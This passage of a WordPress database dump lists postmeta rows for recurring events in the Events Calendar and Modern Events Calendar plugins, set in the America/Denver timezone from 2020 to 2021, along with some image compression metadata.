\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"4\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-14\";s:14:\"EventStartDate\";s:19:\"2020-12-10 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-10 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117494,262897,'_EventShowMapLink','1'),(117495,262897,'_EventShowMap','1'),(117496,262897,'_EventVenueID','262507'),(117497,262897,'_EventCurrencySymbol',''),(95677,262070,'_RTECnumRegistered','1'),(97386,262066,'_RTECmaxRegistrations','30'),(97385,262066,'_RTEClimitRegistrations','0'),(97384,262066,'_RTECwhoCanRegister','any'),(95676,262070,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(97382,262066,'_RTECregistrationsDisabled','0'),(95653,262070,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(95655,262070,'_dp_original','257760'),(95656,262070,'_edit_lock','1609185835:2'),(103844,262422,'protect_children',''),(103845,262422,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1606986786;s:12:\"_EventOrigin\";i:1606986786;s:13:\"_thumbnail_id\";i:1606988354;s:24:\"boldgrid_hide_page_title\";i:1606986786;s:17:\"_EventShowMapLink\";i:1606986786;s:13:\"_EventShowMap\";i:1606986786;s:15:\"_EventStartDate\";i:1607030875;s:13:\"_EventEndDate\";i:1607030875;s:18:\"_EventStartDateUTC\";i:1607030875;s:16:\"_EventEndDateUTC\";i:1607030875;s:14:\"_EventDuration\";i:1606988354;s:20:\"_EventCurrencySymbol\";i:1606986786;s:22:\"_EventCurrencyPosition\";i:1606986786;s:10:\"_EventCost\";i:1606986786;s:9:\"_EventURL\";i:1606986786;s:14:\"_EventTimezone\";i:1606986786;s:18:\"_EventTimezoneAbbr\";i:1606986786;s:27:\"_EventNextPendingRecurrence\";i:1606986786;s:12:\"_dp_original\";i:1606986787;s:26:\"_RTECregistrationsDisabled\";i:1606989199;s:17:\"_RTECdeadlineType\";i:1606986787;s:19:\"_RTECwhoCanRegister\";i:1606986787;s:23:\"_RTEClimitRegistrations\";i:1606986787;s:21:\"_RTECmaxRegistrations\";i:1606986787;s:16:\"_EventRecurrence\";i:1606986787;s:18:\"_RTECnumRegistered\";i:1606986815;s:13:\"_EventVenueID\";i:1606991997;s:16:\"tribe_events_cat\";i:1609185816;s:10:\"_edit_last\";i:1606986890;s:10:\"post_title\";i:1606989354;s:12:\"post_content\";i:1607074095;s:11:\"post_status\";i:1606989050;s:22:\"_EventHideFromUpcoming\";i:1606989304;}'),(103846,262422,'_EventOrigin','events-calendar'),(103847,262422,'protect_children',''),(103848,262422,'protect_children',''),(103849,262422,'protect_children',''),(103850,262422,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1606986786;s:12:\"_EventOrigin\";i:1606986786;s:13:\"_thumbnail_id\";i:1606988354;s:24:\"boldgrid_hide_page_title\";i:1606986786;s:17:\"_EventShowMapLink\";i:1606986786;s:13:\"_EventShowMap\";i:1606986786;s:15:\"_EventStartDate\";i:1607030875;s:13:\"_EventEndDate\";i:1607030875;s:18:\"_EventStartDateUTC\";i:1607030875;s:16:\"_EventEndDateUTC\";i:1607030875;s:14:\"_EventDuration\";i:1606988354;s:20:\"_EventCurrencySymbol\";i:1606986786;s:22:\"_EventCurrencyPosition\";i:1606986786;s:10:\"_EventCost\";i:1606986786;s:9:\"_EventURL\";i:1606986786;s:14:\"_EventTimezone\";i:1606986786;s:18:\"_EventTimezoneAbbr\";i:1606986786;s:27:\"_EventNextPendingRecurrence\";i:1606986786;s:12:\"_dp_original\";i:1606986787;s:26:\"_RTECregistrationsDisabled\";i:1606989199;s:17:\"_RTECdeadlineType\";i:1606986787;s:19:\"_RTECwhoCanRegister\";i:1606986787;s:23:\"_RTEClimitRegistrations\";i:1606986787;s:21:\"_RTECmaxRegistrations\";i:1606986787;s:16:\"_EventRecurrence\";i:1606986787;s:18:\"_RTECnumRegistered\";i:1606986815;s:13:\"_EventVenueID\";i:1606991997;s:16:\"tribe_events_cat\";i:1609185816;s:10:\"_edit_last\";i:1606986890;s:10:\"post_title\";i:1606989354;s:12:\"post_content\";i:1607074095;s:11:\"post_status\";i:1606989050;s:22:\"_EventHideFromUpcoming\";i:1606989304;}'),(103863,262422,'_EventShowMap',''),(103865,262422,'_EventEndDate','2020-12-05 11:45:00'),(103866,262422,'_EventStartDateUTC','2020-12-05 17:30:00'),(103867,262422,'_EventEndDateUTC','2020-12-05 18:45:00'),(103851,262422,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1606986786;s:12:\"_EventOrigin\";i:1606986786;s:13:\"_thumbnail_id\";i:1606988354;s:24:\"boldgrid_hide_page_title\";i:1606986786;s:17:\"_EventShowMapLink\";i:1606986786;s:13:\"_EventShowMap\";i:1606986786;s:15:\"_EventStartDate\";i:1607030875;s:13:\"_EventEndDate\";i:1607030875;s:18:\"_EventStartDateUTC\";i:1607030875;s:16:\"_EventEndDateUTC\";i:1607030875;s:14:\"_EventDuration\";i:1606988354;s:20:\"_EventCurrencySymbol\";i:1606986786;s:22:\"_EventCurrencyPosition\";i:1606986786;s:10:\"_EventCost\";i:1606986786;s:9:\"_EventURL\";i:1606986786;s:14:\"_EventTimezone\";i:1606986786;s:18:\"_EventTimezoneAbbr\";i:1606986786;s:27:\"_EventNextPendingRecurrence\";i:1606986786;s:12:\"_dp_original\";i:1606986787;s:26:\"_RTECregistrationsDisabled\";i:1606989199;s:17:\"_RTECdeadlineType\";i:1606986787;s:19:\"_RTECwhoCanRegister\";i:1606986787;s:23:\"_RTEClimitRegistrations\";i:1606986787;s:21:\"_RTECmaxRegistrations\";i:1606986787;s:16:\"_EventRecurrence\";i:1606986787;s:18:\"_RTECnumRegistered\";i:1606986815;s:13:\"_EventVenueID\";i:1606991997;s:16:\"tribe_events_cat\";i:1609185816;s:10:\"_edit_last\";i:1606986890;s:10:\"post_title\";i:1606989354;s:12:\"post_content\";i:1607074095;s:11:\"post_status\";i:1606989050;s:22:\"_EventHideFromUpcoming\";i:1606989304;}'),(103862,262422,'_EventShowMapLink',''),(103868,262422,'_EventDuration','4500'),(103869,262422,'_EventCurrencySymbol',''),(103852,262422,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1606986786;s:12:\"_EventOrigin\";i:1606986786;s:13:\"_thumbnail_id\";i:1606988354;s:24:\"boldgrid_hide_page_title\";i:1606986786;s:17:\"_EventShowMapLink\";i:1606986786;s:13:\"_EventShowMap\";i:1606986786;s:15:\"_EventStartDate\";i:1607030875;s:13:\"_EventEndDate\";i:1607030875;s:18:\"_EventStartDateUTC\";i:1607030875;s:16:\"_EventEndDateUTC\";i:1607030875;s:14:\"_EventDuration\";i:1606988354;s:20:\"_EventCurrencySymbol\";i:1606986786;s:22:\"_EventCurrencyPosition\";i:1606986786;s:10:\"_EventCost\";i:1606986786;s:9:\"_EventURL\";i:1606986786;s:14:\"_EventTimezone\";i:1606986786;s:18:\"_EventTimezoneAbbr\";i:1606986786;s:27:\"_EventNextPendingRecurrence\";i:1606986786;s:12:\"_dp_original\";i:1606986787;s:26:\"_RTECregistrationsDisabled\";i:1606989199;s:17:\"_RTECdeadlineType\";i:1606986787;s:19:\"_RTECwhoCanRegister\";i:1606986787;s:23:\"_RTEClimitRegistrations\";i:1606986787;s:21:\"_RTECmaxRegistrations\";i:1606986787;s:16:\"_EventRecurrence\";i:1606986787;s:18:\"_RTECnumRegistered\";i:1606986815;s:13:\"_EventVenueID\";i:1606991997;s:16:\"tribe_events_cat\";i:1609185816;s:10:\"_edit_last\";i:1606986890;s:10:\"post_title\";i:1606989354;s:12:\"post_content\";i:1607074095;s:11:\"post_status\";i:1606989050;s:22:\"_EventHideFromUpcoming\";i:1606989304;}'),(97567,262345,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:35270;s:12:\"smushed-size\";i:9883;s:15:\"savings-percent\";d:71.9800000000000039790393202565610408782958984375;}'),(97562,262345,'_wp_attached_file','2020/12/eck-event-2.png'),(97563,262345,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:152;s:6:\"height\";i:93;s:4:\"file\";s:23:\"2020/12/eck-event-2.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"eck-event-2-150x93.png\";s:5:\"width\";i:150;s:6:\"height\";i:93;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(97564,262345,'original-file','2020/12/eck-event-2-updraft-pre-smush-original.png'),(97565,262345,'smush-complete','1'),(97566,262345,'smush-info','The file was compressed from 34.44 KB to 9.65 KB saving 71.98 percent using WP-Optimize'),(125316,263323,'_RTEClimitRegistrations','0'),(125317,263323,'_RTECmaxRegistrations','30'),(124614,263323,'_EventDuration','5400'),(125435,263328,'_EventOrigin','events-calendar'),(125436,263328,'_EventOrigin','events-calendar'),(125390,263326,'_RTECwhoCanRegister','any'),(125391,263326,'_RTEClimitRegistrations','0'),(125392,263326,'_RTECmaxRegistrations','30'),(125393,263326,'boldgrid_hide_page_title','0'),(125439,263328,'_RTECdeadlineType','start'),(125440,263328,'_RTECwhoCanRegister','any'),(125414,263327,'_RTECdeadlineType','start'),(125415,263327,'_RTECwhoCanRegister','any'),(124742,263327,'_EventStartDate','2021-04-12 19:00:00'),(124711,263326,'_EventEndDate','2021-03-08 20:30:00'),(124712,263326,'_EventEndDateUTC','2021-03-09 03:30:00'),(124713,263326,'_EventDuration','5400'),(125356,263325,'protect_children',''),(125357,263325,'protect_children',''),(125358,263325,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630420;s:12:\"_EventOrigin\";i:1610630420;s:13:\"_thumbnail_id\";i:1610630420;s:26:\"_RTECregistrationsDisabled\";i:1610630420;s:17:\"_RTECdeadlineType\";i:1610630420;s:19:\"_RTECwhoCanRegister\";i:1610630420;s:23:\"_RTEClimitRegistrations\";i:1610630420;s:21:\"_RTECmaxRegistrations\";i:1610630420;s:24:\"boldgrid_hide_page_title\";i:1610630420;s:16:\"_EventRecurrence\";i:1610630420;s:17:\"_EventShowMapLink\";i:1610630420;s:13:\"_EventShowMap\";i:1610630420;s:13:\"_EventVenueID\";i:1610630420;s:20:\"_EventCurrencySymbol\";i:1610630420;s:22:\"_EventCurrencyPosition\";i:1610630420;s:10:\"_EventCost\";i:1610630420;s:9:\"_EventURL\";i:1610630420;s:14:\"_EventTimezone\";i:1610630420;s:12:\"_dp_original\";i:1610630420;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630420;s:16:\"tribe_events_cat\";i:1610655620;}'),(125389,263326,'_RTECdeadlineType','start'),(124709,263326,'_EventStartDate','2021-03-08 19:00:00'),(124710,263326,'_EventStartDateUTC','2021-03-09 02:00:00'),(130061,263622,'_EventEndDate','2021-03-16 19:00:00'),(125388,263326,'_RTECregistrationsDisabled','1'),(125381,263326,'protect_children',''),(125382,263326,'protect_children',''),(125383,263326,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(125384,263326,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(125370,263325,'_EventShowMapLink','1'),(125371,263325,'_EventShowMap','1'),(125372,263325,'_EventVenueID','262507'),(125373,263325,'_EventCurrencySymbol',''),(125374,263325,'_EventCurrencyPosition','prefix'),(125375,263325,'_EventCost',''),(125376,263325,'_EventURL',''),(125377,263325,'_EventTimezone','America/Denver'),(125378,263325,'_dp_original','263319'),(125379,263325,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:12:{i:263323;a:2:{s:9:\"timestamp\";i:1607972400;s:8:\"duration\";i:5400;}i:263324;a:2:{s:9:\"timestamp\";i:1610391600;s:8:\"duration\";i:5400;}i:263325;a:2:{s:9:\"timestamp\";i:1612810800;s:8:\"duration\";i:5400;}i:263326;a:2:{s:9:\"timestamp\";i:1615230000;s:8:\"duration\";i:5400;}i:263327;a:2:{s:9:\"timestamp\";i:1618254000;s:8:\"duration\";i:5400;}i:263328;a:2:{s:9:\"timestamp\";i:1620673200;s:8:\"duration\";i:5400;}i:263329;a:2:{s:9:\"timestamp\";i:1623697200;s:8:\"duration\";i:5400;}i:263330;a:2:{s:9:\"timestamp\";i:1626116400;s:8:\"duration\";i:5400;}i:263331;a:2:{s:9:\"timestamp\";i:1628535600;s:8:\"duration\";i:5400;}i:263332;a:2:{s:9:\"timestamp\";i:1631559600;s:8:\"duration\";i:5400;}i:263333;a:2:{s:9:\"timestamp\";i:1633978800;s:8:\"duration\";i:5400;}i:263334;a:2:{s:9:\"timestamp\";i:1636398000;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:12;}'),(125359,263325,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630420;s:12:\"_EventOrigin\";i:1610630420;s:13:\"_thumbnail_id\";i:1610630420;s:26:\"_RTECregistrationsDisabled\";i:1610630420;s:17:\"_RTECdeadlineType\";i:1610630420;s:19:\"_RTECwhoCanRegister\";i:1610630420;s:23:\"_RTEClimitRegistrations\";i:1610630420;s:21:\"_RTECmaxRegistrations\";i:1610630420;s:24:\"boldgrid_hide_page_title\";i:1610630420;s:16:\"_EventRecurrence\";i:1610630420;s:17:\"_EventShowMapLink\";i:1610630420;s:13:\"_EventShowMap\";i:1610630420;s:13:\"_EventVenueID\";i:1610630420;s:20:\"_EventCurrencySymbol\";i:1610630420;s:22:\"_EventCurrencyPosition\";i:1610630420;s:10:\"_EventCost\";i:1610630420;s:9:\"_EventURL\";i:1610630420;s:14:\"_EventTimezone\";i:1610630420;s:12:\"_dp_original\";i:1610630420;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630420;s:16:\"tribe_events_cat\";i:1610655620;}'),(125363,263325,'_RTECregistrationsDisabled','1'),(125364,263325,'_RTECdeadlineType','start'),(125365,263325,'_RTECwhoCanRegister','any'),(125366,263325,'_RTEClimitRegistrations','0'),(125367,263325,'_RTECmaxRegistrations','30'),(125368,263325,'boldgrid_hide_page_title','0'),(125369,263325,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"1\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-08\";s:14:\"EventStartDate\";s:19:\"2020-11-09 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-09 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(125340,263324,'_RTECwhoCanRegister','any'),(125341,263324,'_RTEClimitRegistrations','0'),(125342,263324,'_RTECmaxRegistrations','30'),(125335,263324,'_EventOrigin','events-calendar'),(125345,263324,'_EventShowMapLink','1'),(125346,263324,'_EventShowMap','1'),(125347,263324,'_EventVenueID','262507'),(125348,263324,'_EventCurrencySymbol',''),(125349,263324,'_EventCurrencyPosition','prefix'),(125350,263324,'_EventCost',''),(125351,263324,'_EventURL',''),(125352,263324,'_EventTimezone','America/Denver'),(125330,263324,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630420;s:12:\"_EventOrigin\";i:1610630420;s:13:\"_thumbnail_id\";i:1610630420;s:26:\"_RTECregistrationsDisabled\";i:1610630420;s:17:\"_RTECdeadlineType\";i:1610630420;s:19:\"_RTECwhoCanRegister\";i:1610630420;s:23:\"_RTEClimitRegistrations\";i:1610630420;s:21:\"_RTECmaxRegistrations\";i:1610630420;s:24:\"boldgrid_hide_page_title\";i:1610630420;s:16:\"_EventRecurrence\";i:1610630420;s:17:\"_EventShowMapLink\";i:1610630420;s:13:\"_EventShowMap\";i:1610630420;s:13:\"_EventVenueID\";i:1610630420;s:20:\"_EventCurrencySymbol\";i:1610630420;s:22:\"_EventCurrencyPosition\";i:1610630420;s:10:\"_EventCost\";i:1610630420;s:9:\"_EventURL\";i:1610630420;s:14:\"_EventTimezone\";i:1610630420;s:12:\"_dp_original\";i:1610630420;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630420;s:16:\"tribe_events_cat\";i:1610655620;}'),(117942,262914,'_EventStartDate','2021-06-06 09:00:00'),(117943,262914,'_EventStartDateUTC','2021-06-06 15:00:00'),(117971,262915,'_EventStartDate','2021-07-04 09:00:00'),(117944,262914,'_EventEndDate','2021-06-06 10:15:00'),(117945,262914,'_EventEndDateUTC','2021-06-06 16:15:00'),(117946,262914,'_EventDuration','4500'),(118829,262954,'_EventEndDateUTC','2021-02-14 17:15:00'),(118830,262954,'_EventDuration','4500'),(118828,262954,'_EventEndDate','2021-02-14 10:15:00'),(118704,262914,'_EventCost',''),(118705,262914,'_EventURL',''),(118706,262914,'_EventTimezone','America/Denver'),(118708,262914,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262909;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262910;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262911;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262912;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262913;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262914;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262915;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262916;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262917;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262918;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118690,262914,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513875;s:12:\"_EventOrigin\";i:1607513875;s:26:\"_RTECregistrationsDisabled\";i:1607513875;s:17:\"_RTECdeadlineType\";i:1607513875;s:19:\"_RTECwhoCanRegister\";i:1607513875;s:23:\"_RTEClimitRegistrations\";i:1607513875;s:21:\"_RTECmaxRegistrations\";i:1607513875;s:24:\"boldgrid_hide_page_title\";i:1607513875;s:16:\"_EventRecurrence\";i:1607513875;s:17:\"_EventShowMapLink\";i:1607513875;s:13:\"_EventShowMap\";i:1607513875;s:13:\"_EventVenueID\";i:1607513875;s:20:\"_EventCurrencySymbol\";i:1607513875;s:22:\"_EventCurrencyPosition\";i:1607513875;s:10:\"_EventCost\";i:1607513875;s:9:\"_EventURL\";i:1607513875;s:14:\"_EventTimezone\";i:1607513875;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513875;s:13:\"_thumbnail_id\";i:1607513875;}'),(118703,262914,'_EventCurrencyPosition','prefix'),(118701,262914,'_EventVenueID','262507'),(118702,262914,'_EventCurrencySymbol',''),(118699,262914,'_EventShowMapLink','1'),(118700,262914,'_EventShowMap','1'),(118692,262914,'_RTECregistrationsDisabled','1'),(118693,262914,'_RTECdeadlineType','start'),(118694,262914,'_RTECwhoCanRegister','any'),(118695,262914,'_RTEClimitRegistrations','0'),(118696,262914,'_RTECmaxRegistrations','30'),(118697,262914,'boldgrid_hide_page_title','0'),(118698,262914,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118691,262914,'_EventOrigin','events-calendar'),(115759,262796,'_RTECwhoCanRegister','any'),(151852,266081,'mec_cancelled_reason',''),(151837,266081,'mec_not_in_days',''),(151838,266081,'mec_hourly_schedules','a:0:{}'),(151839,266081,'mec_booking','a:0:{}'),(151840,266081,'mec_tickets','a:0:{}'),(151841,266081,'mec_fees_global_inheritance','1'),(151842,266081,'mec_fees','a:0:{}'),(151843,266081,'mec_ticket_variations_global_inheritance','1'),(151844,266081,'mec_ticket_variations','a:0:{}'),(151845,266081,'mec_reg_fields_global_inheritance','1'),(151846,266081,'mec_reg_fields','a:0:{}'),(151847,266081,'mec_bfixed_fields','a:0:{}'),(151848,266081,'mec_op','a:0:{}'),(151849,266081,'mec_fields','a:0:{}'),(151850,266081,'mec_event_status','EventScheduled'),(151851,266081,'mec_moved_online_link',''),(115732,262795,'protect_children',''),(115733,262795,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511404;s:12:\"_EventOrigin\";i:1607511404;s:13:\"_thumbnail_id\";i:1607511404;s:26:\"_RTECregistrationsDisabled\";i:1607511404;s:17:\"_RTECdeadlineType\";i:1607511404;s:19:\"_RTECwhoCanRegister\";i:1607511404;s:23:\"_RTEClimitRegistrations\";i:1607511404;s:21:\"_RTECmaxRegistrations\";i:1607511404;s:24:\"boldgrid_hide_page_title\";i:1607511404;s:16:\"_EventRecurrence\";i:1607511404;s:17:\"_EventShowMapLink\";i:1607511404;s:13:\"_EventShowMap\";i:1607511404;s:13:\"_EventVenueID\";i:1607511404;s:20:\"_EventCurrencySymbol\";i:1607511404;s:22:\"_EventCurrencyPosition\";i:1607511404;s:10:\"_EventCost\";i:1607511404;s:9:\"_EventURL\";i:1607511404;s:14:\"_EventTimezone\";i:1607511404;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511404;s:16:\"tribe_events_cat\";i:1607536604;}'),(115686,262792,'_EventURL',''),(115687,262792,'_EventTimezone','America/Denver'),(115722,262794,'_EventShowMapLink','1'),(115723,262794,'_EventShowMap','1'),(115724,262794,'_EventVenueID','262507'),(115725,262794,'_EventCurrencySymbol',''),(115726,262794,'_EventCurrencyPosition','prefix'),(114512,262793,'_EventStartDate','2021-03-21 09:00:00'),(114513,262793,'_EventStartDateUTC','2021-03-21 15:00:00'),(115727,262794,'_EventCost',''),(114514,262793,'_EventEndDate','2021-03-21 10:10:00'),(115728,262794,'_EventURL',''),(114515,262793,'_EventEndDateUTC','2021-03-21 16:10:00'),(115729,262794,'_EventTimezone','America/Denver'),(114516,262793,'_EventDuration','4200'),(116690,262869,'protect_children',''),(115702,262793,'_EventShowMap','1'),(115703,262793,'_EventVenueID','262507'),(115704,262793,'_EventCurrencySymbol',''),(115705,262793,'_EventCurrencyPosition','prefix'),(115706,262793,'_EventCost',''),(115707,262793,'_EventURL',''),(115708,262793,'_EventTimezone','America/Denver'),(115709,262793,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262791;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4200;}i:262792;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4200;}i:262793;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4200;}i:262794;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4200;}i:262795;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4200;}i:262796;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4200;}i:262797;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4200;}i:262798;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4200;}i:262799;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4200;}i:262800;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(151816,266081,'mec_timezone','global'),(115694,262793,'_RTECregistrationsDisabled','1'),(115695,262793,'_RTECdeadlineType','start'),(115696,262793,'_RTECwhoCanRegister','any'),(115697,262793,'_RTEClimitRegistrations','0'),(115698,262793,'_RTECmaxRegistrations','30'),(115692,262793,'_EventOrigin','events-calendar'),(115699,262793,'boldgrid_hide_page_title','0'),(115700,262793,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:10:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115701,262793,'_EventShowMapLink','1'),(115690,262793,'protect_children',''),(115691,262793,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511404;s:12:\"_EventOrigin\";i:1607511404;s:13:\"_thumbnail_id\";i:1607511404;s:26:\"_RTECregistrationsDisabled\";i:1607511404;s:17:\"_RTECdeadlineType\";i:1607511404;s:19:\"_RTECwhoCanRegister\";i:1607511404;s:23:\"_RTEClimitRegistrations\";i:1607511404;s:21:\"_RTECmaxRegistrations\";i:1607511404;s:24:\"boldgrid_hide_page_title\";i:1607511404;s:16:\"_EventRecurrence\";i:1607511404;s:17:\"_EventShowMapLink\";i:1607511404;s:13:\"_EventShowMap\";i:1607511404;s:13:\"_EventVenueID\";i:1607511404;s:20:\"_EventCurrencySymbol\";i:1607511404;s:22:\"_EventCurrencyPosition\";i:1607511404;s:10:\"_EventCost\";i:1607511404;s:9:\"_EventURL\";i:1607511404;s:14:\"_EventTimezone\";i:1607511404;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511404;s:16:\"tribe_events_cat\";i:1607536604;}'),(115689,262793,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511404;s:12:\"_EventOrigin\";i:1607511404;s:13:\"_thumbnail_id\";i:1607511404;s:26:\"_RTECregistrationsDisabled\";i:1607511404;s:17:\"_RTECdeadlineType\";i:1607511404;s:19:\"_RTECwhoCanRegister\";i:1607511404;s:23:\"_RTEClimitRegistrations\";i:1607511404;s:21:\"_RTECmaxRegistrations\";i:1607511404;s:24:\"boldgrid_hide_page_title\";i:1607511404;s:16:\"_EventRecurrence\";i:16075